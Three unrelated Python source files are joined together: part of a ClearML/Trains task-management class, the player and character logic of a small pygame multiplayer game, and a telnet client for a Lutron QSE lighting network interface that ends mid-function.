execution = tasks.Execution(parameters=parameters)
else:
execution.parameters = parameters
self._edit(execution=execution)
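    # Usage sketch (hypothetical values): positional dicts/iterables and kwargs
    # are merged into one mapping, and every value is stored as a string:
    #
    #   task.set_parameters({'lr': 0.01}, [('epochs', 10)], batch_size=32)
    #   task.get_parameter('lr')  # -> '0.01'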
def set_parameter(self, name, value, description=None):
"""
Set a single task parameter. This overrides any previous value for this parameter.
:param name: Parameter name
:param value: Parameter value
:param description: Parameter description (unused for now)
"""
params = self.get_parameters()
params[name] = value
self.set_parameters(params)
def get_parameter(self, name, default=None):
"""
Get a value for a parameter.
:param name: Parameter name
:param default: Default value
:return: Parameter value (or default value if parameter is not defined)
"""
params = self.get_parameters()
return params.get(name, default)
def update_parameters(self, *args, **kwargs):
"""
Update parameters for this task.
        This allows updating a complete set of key/value parameters, but does not support
        parameter descriptions (as the input is a dictionary of key/value pairs).
:param args: Positional arguments (one or more dictionary or (key, value) iterable). These will be merged into
a single key/value dictionary.
:param kwargs: Key/value pairs, merged into the parameters dictionary created from `args`.
"""
self.set_parameters(__update=True, *args, **kwargs)
def set_model_label_enumeration(self, enumeration=None):
"""
Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:param dict enumeration: For example: {str(label): integer(id)}
"""
        # Normalize None to an empty enumeration (clears the labels)
        enumeration = enumeration or {}
        with self._edit_lock:
            execution = self.data.execution
if not (isinstance(enumeration, dict)
and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())):
raise ValueError('Expected label to be a dict[str => int]')
execution.model_labels = enumeration
self._edit(execution=execution)
def _set_default_docker_image(self):
if not DOCKER_IMAGE_ENV_VAR.exists():
return
self.set_base_docker(DOCKER_IMAGE_ENV_VAR.get(default=""))
def set_base_docker(self, docker_cmd):
"""
Set the base docker image for this experiment
If provided, this value will be used by trains-agent to execute this experiment
inside the provided docker image.
"""
with self._edit_lock:
self.reload()
execution = self.data.execution
execution.docker_cmd = docker_cmd
self._edit(execution=execution)
def get_base_docker(self):
"""Get the base docker command (image) set for this experiment"""
return self._get_task_property('execution.docker_cmd', raise_on_error=False, log_on_error=False)
def set_artifacts(self, artifacts_list=None):
"""
List of artifacts (tasks.Artifact) to update the task
:param list artifacts_list: list of artifacts (type tasks.Artifact)
"""
if not Session.check_min_api_version('2.3'):
return False
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
            raise ValueError('Expected artifacts to be a list of tasks.Artifact objects')
with self._edit_lock:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
def _set_model_design(self, design=None):
with self._edit_lock:
execution = self.data.execution
if design is not None:
execution.model_desc = Model._wrap_design(design)
self._edit(execution=execution)
def get_labels_enumeration(self):
"""
Return a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:return: dict
"""
if not self.data or not self.data.execution:
return {}
return self.data.execution.model_labels
def get_model_design(self):
"""
Returns the model configuration as blob of text
:return:
"""
design = self._get_task_property("execution.model_desc", default={}, raise_on_error=False, log_on_error=False)
return Model._unwrap_design(design)
def set_output_model_id(self, model_id):
self.data.output.model = str(model_id)
self._edit(output=self.data.output)
def get_random_seed(self):
# fixed seed for the time being
return 1337
def set_random_seed(self, random_seed):
# fixed seed for the time being
pass
def set_project(self, project_id):
assert isinstance(project_id, six.string_types)
self._set_task_property("project", project_id)
self._edit(project=project_id)
def get_project_name(self):
if self.project is None:
return None
if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project:
return self._project_name[1]
res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
self._project_name = (self.project, res.response.project.name)
return self._project_name[1]
def get_tags(self):
return self._get_task_property("tags")
def set_system_tags(self, tags):
assert isinstance(tags, (list, tuple))
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", tags)
self._edit(system_tags=self.data.system_tags)
else:
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_tags(self, tags):
assert isinstance(tags, (list, tuple))
if not Session.check_min_api_version('2.3'):
# not supported
return
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_name(self, name):
"""
        Set the name of the task.
:param name: The name of the task
:type name: str
"""
self._set_task_property("name", str(name))
self._edit(name=self.data.name)
def set_comment(self, comment):
"""
Set a comment text to the task.
:param comment: The comment of the task
:type comment: str
"""
self._set_task_property("comment", str(comment))
self._edit(comment=comment)
def _get_default_report_storage_uri(self):
if not self._files_server:
self._files_server = Session.get_files_server_host()
return self._files_server
@classmethod
def _get_api_server(cls):
return Session.get_api_server_host()
def _get_app_server(self):
if not self._app_server:
self._app_server = Session.get_app_server_host()
return self._app_server
def _edit(self, **kwargs):
with self._edit_lock:
            # Since we are using a forced update, make sure the task status is valid
if not self._data or (str(self.data.status) not in (str(tasks.TaskStatusEnum.created),
str(tasks.TaskStatusEnum.in_progress))):
# the exception being name/comment that we can always change.
if kwargs and all(k in ('name', 'comment') for k in kwargs.keys()):
pass
else:
raise ValueError('Task object can only be updated if created or in_progress')
res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False)
return res
def _update_requirements(self, requirements):
if not isinstance(requirements, dict):
requirements = {'pip': requirements}
# protection, Old API might not support it
try:
self.data.script.requirements = requirements
self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements))
except Exception:
pass
def _update_script(self, script):
self.data.script = script
self._edit(script=script)
@classmethod
def _clone_task(cls, cloned_task_id, name=None, comment=None, execution_overrides=None,
tags=None, parent=None, project=None, log=None, session=None):
"""
Clone a task
:param cloned_task_id: Task ID for the task to be cloned
:type cloned_task_id: str
        :param name: Name for the new task
:type name: str
:param comment: Optional comment for the new task
:type comment: str
:param execution_overrides: Task execution overrides. Applied over the cloned task's execution
section, useful for overriding values in the cloned task.
:type execution_overrides: dict
:param tags: Optional updated model tags
:type tags: [str]
:param parent: Optional parent Task ID of the new task.
:type parent: str
:param project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:type project: str
:param log: Log object used by the infrastructure.
:type log: logging.Logger
:param session: Session object used for sending requests to the API
:type session: Session
        :return: The new task's ID
"""
session = session if session else cls._get_default_session()
res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id))
task = res.response.task
output_dest = None
if task.output:
output_dest = task.output.destination
execution = task.execution.to_dict() if task.execution else {}
execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution),
ConfigFactory.from_dict(execution_overrides or {}))
        # keep only input artifacts (output artifacts do not apply to the new clone)
        execution['artifacts'] = [e for e in execution.get('artifacts', []) if e.get('mode') == 'input']
if not tags and task.tags:
tags = [t for t in task.tags if t != cls._development_tag]
req = tasks.CreateRequest(
name=name or task.name,
type=task.type,
input=task.input if hasattr(task, 'input') else {'view': {}},
tags=tags,
comment=comment or task.comment,
parent=parent,
project=project if project else task.project,
output_dest=output_dest,
execution=execution.as_plain_ordered_dict(),
script=task.script
)
res = cls._send(session=session, log=log, req=req)
cloned_task_id = res.response.id
if task.script and task.script.requirements:
cls._send(session=session, log=log, req=tasks.SetRequirementsRequest(
task=cloned_task_id, requirements=task.script.requirements))
return cloned_task_id
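    # Usage sketch (illustrative ids/values): clone a task, overriding one
    # execution field; the clone inherits the source project when none is given:
    #
    #   new_task_id = Task._clone_task(
    #       cloned_task_id='d1f0...', name='train (clone)',
    #       execution_overrides={'parameters': {'lr': '0.001'}})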
@classmethod
def get_all(cls, session=None, log=None, **kwargs):
"""
List all tasks based on specific projection
:param session: Session object used for sending requests to the API
:type session: Session
:param log: Log object
:type log: logging.Logger
:param kwargs: Keyword args passed to the GetAllRequest (see .backend_api.services.tasks.GetAllRequest)
            Example: status='completed', search_text='specific_word', user='user_id', project='project_id'
:type kwargs: dict
:return: API response
"""
session = session if session else cls._get_default_session()
req = tasks.GetAllRequest(**kwargs)
res = cls._send(session=session, req=req, log=log)
return res
@classmethod
def get_by_name(cls, task_name):
res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name)))
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(task_id=task.id)
def _get_all_events(self, max_events=100):
"""
Get a list of all reported events.
Warning: Debug only. Do not use outside of testing.
:param max_events: The maximum events the function will return. Pass None
to return all the reported events.
:return: A list of events from the task.
"""
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order='asc',
batch_size=max_events,
))
events_list = log_events.response.events
total_events = log_events.response.total
scroll = log_events.response.scroll_id
while len(events_list) < total_events and (max_events is None or len(events_list) < max_events):
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order='asc',
batch_size=max_events,
scroll_id=scroll,
))
events_list.extend(log_events.response.events)
scroll = log_events.response.scroll_id
return events_list
|
Players.py
|
import sys
sys.path.append("C:/Users/David/Desktop/programacion/python/Anime Battle Online/server")
import threading
import pygame.image
from random import randint
import settings
import Globals
from functions.ShortFunctions import *
from classes.Bullet import Bullet
class Player():
def __init__(self, numero):
self.n = numero
self.addr = 0
self.ready = False
self.name = ""
self.character = 0
#CHARGING
#~ def tStartChargingAttack(self):
#~ self.chargingAttack = True
#~ while self.chargingAttack == True and self.chargingAttackDmgMultiplier < 5: #must be changed when the server receives stopChargingAttack
#~ if self.alive == True:
#~ self.chargingAttackDmgMultiplier += 0.2
#~ self.chargingAttackSizeMultiplier += 0.2
#~ self.chargingAttackSpeedMultiplier += 0.05
#~ pygame.time.wait(100)
#~ def stopChargingAttack(self, pos):
#~ self.chargingAttack = False
#~ self.shoot(pos, self.bulletDmg*self.chargingAttackDmgMultiplier, self.chargingAttackSizeMultiplier, self.chargingAttackSpeedMultiplier)
#~ self.chargingAttackDmgMultiplier = 1
#~ self.chargingAttackSizeMultiplier = 1
#~ self.chargingAttackSpeedMultiplier = 1
    def reset(self):  # reset every value back to its initial state
self.character.reset()
self.addr = 0
self.ready = False
self.name = ""
class character():  # base character class; the default playable character
def __init__(self, nPlayer, n=1):
self.n = n
self.nPlayer = nPlayer
self.lastPos = [1,1]
self.Input = [0, 0]
self.direction = [0, 0]
self.points = 0
self.moving = False
image = pygame.image.load("graphics/pjs/" + str(self.n) + "/StillRight1.png")
self.imageSize = image.get_size()
        self.rect = pygame.Rect(50,50,self.imageSize[0]*0.7, self.imageSize[1]*0.7)  # the collision rect is slightly smaller than the actual image, for a tighter fit
        #self.lastUpdate = 16  # theoretical value at 62.5fps: 1000 ms / 62.5 = 16 ms; updated every time the player moves, to keep it accurate
self.initialBulletPos = ((self.rect.centerx + ((self.rect.width-20)*self.direction[0])), (self.rect.centery+20))
self.couldBeInsideWall = True
self.movementAvailable = True
        self.speed = 0.25  # 0.0625 0.125 0.25 0.5 1; was 0.25
        self.bulletSpeed = 0.75  # was 0.75
        self.shootSpeed = 200  # milliseconds; was 200
self.bulletSizeMultiplier = 1
self.maxHp = 100
self.hp = self.maxHp
        self.timeToRevive = 5000  # milliseconds
self.alive = True
self.bulletDmg = 5
self.lastTimeShot = 0
self.chargingAttack = False
self.chargingAttackDmgMultiplier = 1
self.chargingAttackSizeMultiplier = 1
self.chargingAttackSpeedMultiplier = 1
self.balas = []
        self.playerVarsBeenChanging = []  # structure: [[VAR, CHANGEBY], [VAR, CHANGEBY], ...]
        self.cd2 = 26  # the ultimate has a 26 second cooldown
        self.actualCd2 = 0  # the ultimate starts off cooldown
def shoot(self, posToShoot, dmg, sizeMultiplier=1, speedMultiplier=1, nImagen=0):
        if sizeMultiplier == 1:  # this argument defaults to 1; if a value is passed, that value is used
            sizeMultiplier = self.bulletSizeMultiplier  # otherwise it falls back to self.bulletSizeMultiplier
if not nImagen:
nImagen = self.n
        if self.alive and not self.chargingAttack:
            time = pygame.time.get_ticks()
            if time - self.lastTimeShot >= self.shootSpeed:  # then shoot
vector = pygame.math.Vector2(posToShoot[0] - self.initialBulletPos[0], posToShoot[1] - self.initialBulletPos[1])
if vector.length() != 0:
vector.scale_to_length(self.bulletSpeed*speedMultiplier)
else:
return
angle = vector.angle_to((1,0))
#print("Vector:", vector, ". Angle:", angle)
n=1
result = getBulletByNumber(n, self)
                if result:  # if bullet number 1 already exists
                    while result:
                        n += 1  # keep incrementing n until bullet n does not exist, then create it
                        result = getBulletByNumber(n, self)
sendDataToAllPlayers(packPacket(["newBullet", self.nPlayer, sizeMultiplier, angle, nImagen, self.initialBulletPos[0], self.initialBulletPos[1]]))
locals()["bala" + str(n)] = Bullet(n, self.nPlayer, self.initialBulletPos, vector, dmg, sizeMultiplier, nImagen)
self.balas.append(eval("bala" + str(n)))
self.lastTimeShot = time
def calcPos(self, MurosRects):
#print(self.rect.centerx, self.rect.centery)
if self.couldBeInsideWall:
while self.rect.collidelist(MurosRects) != -1:
self.rect.centerx, self.rect.centery = randint(int(self.rect.width/2), int(settings.CLIENT_SCREEN_SIZE[0]-(self.rect.width/2))) , randint(int(1+self.rect.height/2), int(settings.CLIENT_SCREEN_SIZE[1]-(self.rect.height/2)))
self.couldBeInsideWall = False
        if self.alive and self.movementAvailable:
possiblePos = [0,0]
            possiblePos[0] = self.rect.centerx + (self.Input[0] * self.speed * 16)  # LASTUPDATE
            possiblePos[1] = self.rect.centery + (self.Input[1] * self.speed * 16)  # 16 is the number of milliseconds per frame at ~60fps
possibleRectx, possibleRecty = self.rect.copy(), self.rect.copy()
possibleRectx.centerx = possiblePos[0]
possibleRecty.centery = possiblePos[1]
            if possiblePos[0] > (self.rect.width/2) and possiblePos[0] < (settings.CLIENT_SCREEN_SIZE[0]-(self.rect.width/2)):  # check whether it would leave the screen
                if possibleRectx.collidelist(MurosRects) == -1:  # if it does not collide with any wall, update the position
self.rect.centerx = possiblePos[0]
if possiblePos[1] > (self.rect.height/2) and possiblePos[1] < (settings.CLIENT_SCREEN_SIZE[1]-(self.rect.height/2)):
if possibleRecty.collidelist(MurosRects) == -1:
self.rect.centery = possiblePos[1]
        if self.rect.centerx - self.lastPos[0] != 0:  # if it moved, compute the direction (1 or -1)
self.direction[0] = (self.rect.centerx - self.lastPos[0])/abs(self.rect.centerx - self.lastPos[0])
if self.rect.centery - self.lastPos[1] != 0:
self.direction[1] = (self.rect.centery - self.lastPos[1])/abs(self.rect.centery - self.lastPos[1])
        self.initialBulletPos = ((self.rect.centerx + ((self.rect.width-20)*self.direction[0])), (self.rect.centery+20))  # compute the initial position bullets are fired from
#print(self.playerVarsBeenChanging)
def checkIfCollidingWithPlayers(self):
colisionIndexList = self.rect.collidelistall(Globals.JugadoresEncontradosRects)
return colisionIndexList
        # if colision != -1:
        #     print("Player " + str(self.n) + " is colliding.")
def decreaseHp(self,n, characterQueHaceDaño):
self.hp -= n
if self.hp > 0:
sendDataToAllPlayers(packPacket(["changeHp", self.nPlayer, self.hp]))
        elif self.hp <= 0:  # DEATH --------------
            if self.alive:
self.die()
characterQueHaceDaño.points += 1
def die(self):
sendDataToAllPlayers(packPacket(["state", self.nPlayer, "dead"]))
sendDataToAllPlayers(packPacket(["changeHp", self.nPlayer, 0]))
self.alive = False
self.movementAvailable = False
#~ self.chargingAttackDmgMultiplier = 1 #CHARGING
#~ self.chargingAttackSizeMultiplier = 1
Globals.JugadoresEncontradosRects.remove(self.rect)
threadToRevive = threading.Thread(target=self.tRevive, name="self.tRevive", daemon=True)
threadToRevive.start()
def tRevive(self):
pygame.time.wait(self.timeToRevive)
if Globals.JugadoresEncontrados.count(getPlayerByNumber(self.nPlayer)):
self.alive = True
self.movementAvailable = True
self.hp = self.maxHp
sendDataToAllPlayers(packPacket(["state", self.nPlayer, "normal"]))
sendDataToAllPlayers(packPacket(["changeHp", self.nPlayer, self.maxHp]))
Globals.JugadoresEncontradosRects.append(self.rect)
self.rect.centerx, self.rect.centery = randint(int(self.rect.width/2), int(settings.CLIENT_SCREEN_SIZE[0]-(self.rect.width/2))) , randint(int(1+self.rect.height/2), int(settings.CLIENT_SCREEN_SIZE[1]-(self.rect.height/2)))
self.couldBeInsideWall = True
    def reset(self):  # reset every value back to its initial state
        self.rect.centerx, self.rect.centery = 50,50
        self.lastPos = [1,1]
        self.hp = self.maxHp
        self.alive = True
        self.speed = 0.25  # 0.0625 0.125 0.25 0.5 1; was 0.25
        self.bulletSpeed = 0.75  # was 0.75
        self.shootSpeed = 200  # milliseconds; was 200
        self.maxHp = 100
        self.hp = self.maxHp
        self.timeToRevive = 3000  # milliseconds
        self.bulletDmg = 5
        self.actualCd2 = 0  # the ultimate starts off cooldown
        self.movementAvailable = True
        if self.playerVarsBeenChanging:  # if the player picked up a buff and then disconnected, the thread that restores the value is still waiting
            # that thread records the variable being changed and the amount added inside self.playerVarsBeenChanging, and removes the entry after restoring the player's variable
            # each element of playerVarsBeenChanging is [VAR, CHANGEBY]
            # however, the value was already reset by the disconnect, so bump it back up here so the thread can lower it again and leave it reset
            for elemento in self.playerVarsBeenChanging:
                setattr(self, elemento[0], getattr(self, elemento[0]) + elemento[1])  # adjust the attribute named in elemento[0] on this character
    def tCdSkill(self, nSkill, cdToWait, cdsToSendToClient):
        argsPacket = ["cd", nSkill]
        for cdToSendToClient in cdsToSendToClient:
            argsPacket.append(cdToSendToClient)
        sendDataToPlayer(packPacket(argsPacket), getPlayerByNumber(self.nPlayer))
        # track the cooldown in a dynamically named attribute, e.g. self.actualCd2;
        # getattr/setattr is the reliable way to do this (writing into locals() is not)
        attr_name = "actualCd" + str(nSkill)
        setattr(self, attr_name, cdToWait)
        while getattr(self, attr_name) > 0:
            pygame.time.wait(100)
            setattr(self, attr_name, getattr(self, attr_name) - 0.1)
    def tDefaultBuffSkill(self, varsAndChangebysList, timeMiliseconds):  # varsAndChangebysList: [[var, changeby], [var, changeby], ...]
for varAndChangeby in varsAndChangebysList:
setattr(self, varAndChangeby[0], getattr(self, varAndChangeby[0]) + varAndChangeby[1])
self.playerVarsBeenChanging.append([varAndChangeby[0], varAndChangeby[1]])
sendDataToAllPlayers(packPacket(["state", self.nPlayer, "buffed"]))
pygame.time.wait(round(timeMiliseconds))
sendDataToAllPlayers(packPacket(["state", self.nPlayer, "normal"]))
for varAndChangeby in varsAndChangebysList:
setattr(self, varAndChangeby[0], getattr(self, varAndChangeby[0]) - varAndChangeby[1])
self.playerVarsBeenChanging.remove([varAndChangeby[0], varAndChangeby[1]])
def tChangeVarForTime(self, var, newValue, timeMiliseconds):
oldValue = getattr(self, var)
setattr(self, var, newValue)
self.playerVarsBeenChanging.append([var, newValue-oldValue])
pygame.time.wait(round(timeMiliseconds))
setattr(self, var, oldValue)
self.playerVarsBeenChanging.remove([var, newValue-oldValue])
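    # Illustrative sketch of the buff mechanism above (values are made up):
    # tDefaultBuffSkill applies each [var, changeby] delta, waits, then reverts,
    # so a temporary fire-rate/projectile-speed buff looks like:
    #
    #   buffs = [["shootSpeed", -100], ["bulletSpeed", 0.25]]
    #   threading.Thread(target=some_character.tDefaultBuffSkill,
    #                    args=(buffs, 3000), daemon=True).start()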
class charNaruto(character):
def __init__(self, nPlayer):
super().__init__(nPlayer, 1)
def tSkill1(self, mousePos):
pass
def tSkill2(self, mousePos):
        # signature: self.shoot(posToShoot, dmg, sizeMultiplier=1, speedMultiplier=1, nImagen=0)
if self.actualCd2 <= 0:
#~ if self.direction[0] == 1:
#~ sendDataToAllPlayers(packPacket(["animation", self.nPlayer, "ChargeRasenganRight"]))
#~ elif self.direction[0] == -1:
#~ sendDataToAllPlayers(packPacket(["animation", self.nPlayer, "ChargeRasenganLeft"]))
sendDataToAllPlayers(packPacket(["state", self.nPlayer, "chargingAttack"]))
threadCdUlti = threading.Thread(target=self.tCdSkill, args=(2, self.cd2, [self.cd2]), name="self.tCdSkill", daemon=True)
threadCdUlti.start()
self.tChangeVarForTime("movementAvailable", False, 500) #no es necesario hacer un thread, ya que simplemente podemos esperar
sendDataToAllPlayers(packPacket(["state", self.nPlayer, "normal"]))
            self.lastTimeShot = pygame.time.get_ticks() - self.shootSpeed  # so the character is immediately ready to shoot
self.shoot(mousePos, self.bulletDmg*15, 1, 2, "1_ulti")
class charHinata(character):
def __init__(self, nPlayer):
super().__init__(nPlayer, 2)
self.timeSkill2 = 4.5
def tSkill1(self, mousePos):
pass
def tSkill2(self, mousePos):
if self.actualCd2 <= 0:
shootSpeedChangeValue = -150
bulletSpeedChangeValue = 0.75
varsAndChangebysList = [["shootSpeed", shootSpeedChangeValue],["bulletSpeed", bulletSpeedChangeValue]]
threadCdUlti = threading.Thread(target=self.tCdSkill, args=(2, self.cd2, [self.timeSkill2, self.cd2 - self.timeSkill2]), name="self.tCdSkill", daemon=True)
threadCdUlti.start()
self.tDefaultBuffSkill(varsAndChangebysList, self.timeSkill2*1000)
#~ threadBuffUlti = threading.Thread(target=self.tDefaultBuffSkill, args=(varsAndChangebysList, self.timeSkill2*1000))
#~ threadBuffUlti.setDaemon = True
#~ threadBuffUlti.start()
class charSaitama(character):
def __init__(self, nPlayer):
super().__init__(nPlayer, 3)
def tSkill1(self, mousePos):
pass
def tSkill2(self, mousePos):
if self.actualCd2 <= 0:
threadCdUlti = threading.Thread(target=self.tCdSkill, args=(2, self.cd2, [self.cd2]), name="self.tCdSkill", daemon=True)
threadCdUlti.start()
colisionIndexList = self.checkIfCollidingWithPlayers()
            for colisionIndex in reversed(colisionIndexList):  # iterate in reverse because when a player dies it is removed from that list,
                # so the entry at index 2 would shift down to index 1
                # getPlayerByNumber(colisionIndex+1).character.decreaseHp(100) only works while no character has left the game
playerColisionado = getPlayerByRect(Globals.JugadoresEncontradosRects[colisionIndex])
if playerColisionado.character.rect != self.rect:
sendDataToAllPlayers(packPacket(["state", self.nPlayer, "chargingAttack"]))
threadInmovilizar = threading.Thread(target=self.tChangeVarForTime, args=("movementAvailable", False, 500), name="self.tChangeVarForTime", daemon=True)
threadInmovilizar.start()
                    playerColisionado.character.tChangeVarForTime("movementAvailable", False, 500)  # a thread is needed when two vars must change at once
playerColisionado.character.decreaseHp(100, self)
sendDataToAllPlayers(packPacket(["state", self.nPlayer, "normal"]))
class charDeku(character):
def __init__(self, nPlayer):
super().__init__(nPlayer, 4)
self.timeSkill2 = 4.5
def tSkill1(self, mousePos):
pass
def tSkill2(self, mousePos):
if self.actualCd2 <= 0:
dmgChangeValue = 30
bulletSizeMultiplierChangeValue = 0.5
shootSpeedChangeValue = 300
speedChangeValue = 0.25
varsAndChangebysList = [["bulletDmg", dmgChangeValue],["bulletSizeMultiplier", bulletSizeMultiplierChangeValue], ["shootSpeed", shootSpeedChangeValue], ["speed", speedChangeValue]]
threadBuffUlti = threading.Thread(target=self.tDefaultBuffSkill, args=(varsAndChangebysList, self.timeSkill2*1000), name="self.tDefaultBuffSkill", daemon=True)#[[value, changeby][value, changeby]]
threadBuffUlti.start()
threadCdUlti = threading.Thread(target=self.tCdSkill, args=(2, self.cd2, [self.timeSkill2, self.cd2 - self.timeSkill2]), name="self.tCdSkill", daemon=True)
threadCdUlti.start()
class charSora(character):
def __init__(self, nPlayer):
super().__init__(nPlayer, 5)
def tSkill1(self, mousePos):
pass
def tSkill2(self, mousePos):
if self.actualCd2 <= 0:
            puntos = getPuntosPerimetroCuadrado(2)  # gets the points on the perimeter of a square whose distance to the center is 2
            # see that function for more details
for punto in puntos:
self.shoot((self.initialBulletPos[0] + punto[0], self.initialBulletPos[1] + punto[1]), self.bulletDmg)
            self.lastTimeShot = pygame.time.get_ticks() - self.shootSpeed  # so the character is immediately ready to shoot
threadCdUlti = threading.Thread(target=self.tCdSkill, args=(2, self.cd2, [self.cd2]), name="self.tCdSkill", daemon=True)
threadCdUlti.start()
#print(self.balas)
|
qse.py
|
"""API for Lutron QSE network interface (QSE-CI-NWK-E)."""
import datetime
import logging
import socket
import telnetlib
import time
from threading import Thread, Lock
from typing import List
from pylutron_qse.devices import (ALL_STATES, Device, Roller)
_LOG = logging.getLogger('qse')
_LOG.setLevel(logging.DEBUG)
# Timeout and retry constants.
_TIMEOUT = 3
_LOGIN_ATTEMPT_INTERVAL = datetime.timedelta(seconds=60)
_DEVICE_DISCOVERY_INTERVAL = datetime.timedelta(seconds=10 * 60)
_MONITOR_INTERVAL = datetime.timedelta(milliseconds=50)
# Misc QSE strings.
_DELIMITER = b','
_DEFAULT_COMPONENT = b'0'
_DEFAULT_USERNAME = 'nwk'
_EOL = b'\r\n'
_ID_ALL_DEVICES = b'ALL_DEVICES'
_LOGIN_PROMPT = b'login: '
_LOGIN_SUCCESS = b'connection established' + _EOL
_PROMPT = b'QSE>'
# Operations
_OP_COMMAND = b'#'
_OP_REQUEST = b'?'
_OP_RESPONSE = b'~'
# Commands
_CMD_DETAILS = b'DETAILS'
_CMD_DEVICE = b'DEVICE'
# Details request/response strings
_DETAILS_INTEGRATION_ID = b'INTEGRATIONID:'
_DETAILS_INTEGRATION_ID_NOT_SET = b'(Not Set)'
_DETAILS_PRODUCT = b'PRODUCT:'
_DETAILS_PRODUCT_ROLLERS = [b'ROLLER(1)']
_DETAILS_SERIAL_NUMBER = b'SN:'
def _command_from_parts(cmd_parts):
return _DELIMITER.join(cmd_parts) + _EOL
class QSE(object):
"""
Lutron QSE network interface (QSE-CI-NWK-E).
See Lutron integration protocol (search: "QS Standalone"):
http://www.lutron.com/TechnicalDocumentLibrary/040249.pdf
"""
def __init__(self, hostname=None, username=_DEFAULT_USERNAME):
"""Consructor for QSE."""
self._hostname = hostname
self._username = username
self._telnet = None
self._telnet_lock = Lock()
self._devices = {}
self._last_login_attempt = None
self._last_device_discovery = None
# Initial login and device discovery.
self._telnet = self._lock_and_do(self._login)
self._lock_and_do_if_connected(self._load_devices)
# Start background monitoring thread.
monitor = Thread(target=self._monitor)
        monitor.daemon = True
monitor.start()
def connected(self) -> bool:
"""Return True if connection to QSE is active."""
return self._telnet is not None
def devices(self) -> List[Device]:
"""Return all devices."""
return self._devices.values()
def rollers(self) -> List[Roller]:
"""Return all roller devices."""
return [r for r in self._devices.values() if isinstance(r, Roller)]
def _lock_and_do_if_connected(self, callback, *args):
return self._lock_and_do(callback, True, *args)
def _lock_and_do(self, callback, test_connected=False, *args):
self._telnet_lock.acquire()
if test_connected and not self._telnet:
self._telnet_lock.release()
return
result = callback(*args)
self._telnet_lock.release()
return result
def _login(self):
"""Open connection to telnet."""
self._last_login_attempt = datetime.datetime.now()
_LOG.debug('Logging in to Lutron QSE')
try:
telnet = telnetlib.Telnet(self._hostname, timeout=_TIMEOUT)
response = telnet.read_until(_LOGIN_PROMPT, timeout=_TIMEOUT)
assert response == _LOGIN_PROMPT, response
telnet.write(bytes(self._username, encoding='ascii') + _EOL)
response = telnet.read_until(_LOGIN_SUCCESS, timeout=_TIMEOUT)
assert response == _LOGIN_SUCCESS, response
except (socket.error, socket.gaierror, socket.timeout, EOFError):
            _LOG.error('Failed to connect to Lutron QSE. '
                       'Retry in %d seconds.', _LOGIN_ATTEMPT_INTERVAL.total_seconds())
return None
_LOG.info("Logged in to Lutron QSE")
return telnet
def _close(self):
"""Close connection to telnet."""
_LOG.debug("Closing connection to Lutron QSE")
self._telnet.close()
self._telnet = None
_LOG.info("Connection to Lutron QSE closed")
def _load_devices(self):
"""Load all devices."""
self._last_device_discovery = datetime.datetime.now()
# Details query to initialize all devices.
result = self._exec(_command_from_parts(
[_OP_REQUEST + _CMD_DETAILS, _ID_ALL_DEVICES]))
for response in result:
assert isinstance(response, list), response
assert response, response
self._init_device(response)
# Query all device states.
for state in ALL_STATES:
result = self._exec(_command_from_parts(
[_OP_REQUEST + _CMD_DEVICE, _ID_ALL_DEVICES,
_DEFAULT_COMPONENT, state]))
for response in result:
assert isinstance(response, list), response
assert response, response
if response[0] != _OP_RESPONSE + _CMD_DEVICE:
_LOG.warning(
'Ignoring unexpected response: ' + str(response))
continue
self._route_device_response(response)
def _monitor(self):
_LOG.debug('Entering background monitoring thread.')
while True:
now = datetime.datetime.now()
# Try login if we are not connected.
if not self._telnet:
next_login = self._last_login_attempt + _LOGIN_ATTEMPT_INTERVAL
if now < next_login:
time.sleep((next_login - now).total_seconds())
continue
else:
self._telnet = self._lock_and_do(self._login)
# Discover devices.
            if self._last_device_discovery is None or now > self._last_device_discovery + _DEVICE_DISCOVERY_INTERVAL:
self._lock_and_do_if_connected(self._load_devices)
# Read events.
self._lock_and_do_if_connected(self._read_events)
time.sleep(float(_MONITOR_INTERVAL.microseconds) / 1e6)
_LOG.debug('Exiting background monitoring thread.')
def _read_events(self):
"""Read events."""
result = self._read_if_available()
for response in result:
assert isinstance(response, list), response
assert response, response
if response[0] == _OP_RESPONSE + _CMD_DEVICE:
self._route_device_response(response)
def _init_device(self, response):
if not response or response[0] != _OP_RESPONSE + _CMD_DETAILS:
_LOG.warning('Ignoring unexpected response: ' + str(response))
return
assert len(response) >= 5, response
assert response[1].startswith(_DETAILS_SERIAL_NUMBER), response
assert response[2].startswith(_DETAILS_INTEGRATION_ID), response
assert response[4].startswith(_DETAILS_PRODUCT), response
serial_number = response[1][len(_DETAILS_SERIAL_NUMBER):]
integration_id = response[2][len(_DETAILS_INTEGRATION_ID):]
product = response[4][len(_DETAILS_PRODUCT):]
if serial_number in self._devices:
return
if integration_id == _DETAILS_INTEGRATION_ID_NOT_SET:
integration_id = None
if product in _DETAILS_PRODUCT_ROLLERS:
device = Roller(self, serial_number, integration_id)
else:
device = Device(self, serial_number, integration_id)
assert device
self._devices[serial_number] = device
def _route_device_response(self, response):
assert len(response) >= 2, response
assert response[0] == _OP_RESPONSE + _CMD_DEVICE, response
id_or_sn = response[1]
if id_or_sn in self._devices:
# Serial number
# pylint: disable=protected-access
self._devices[id_or_sn]._handle_response(response)
return
else:
# Integration id
id_string = id_or_sn.decode('ascii')
devices_with_id = [d for d in self._devices.values()
